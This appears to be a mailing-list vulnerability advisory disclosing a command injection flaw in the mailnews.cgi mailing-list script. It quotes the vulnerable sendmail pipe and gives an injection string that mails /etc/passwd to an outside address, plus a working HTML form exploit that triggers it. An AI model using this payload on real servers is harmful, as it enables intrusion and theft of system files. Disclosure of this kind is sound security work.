CGI - mailnews.cgi vulnerability...

[Kanedaaa Bohater <kaneda () AC PL>]

Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:

<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

Author dont parse some characters and he use very stupid "password
protection". We can add or delete users from maillist without known
admin password. But this is small problem ;] . Lets see what we can do
more.
<cat source>
        open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail
adam () malysz pl' and use subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi"; METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ;  [ex:" ; cat /etc/passwd |mail adam () malysz pl"
without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<INPUT  TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news";>
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who :   Kanedaaa
        kaneda () ac pl


***$$$###  " I moze bardzo wielu nie zrozumie tych slow...
                Ale nie ma litosci dla SKURWYSYNOW .... " ###$$*
kaneda () ac pl Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..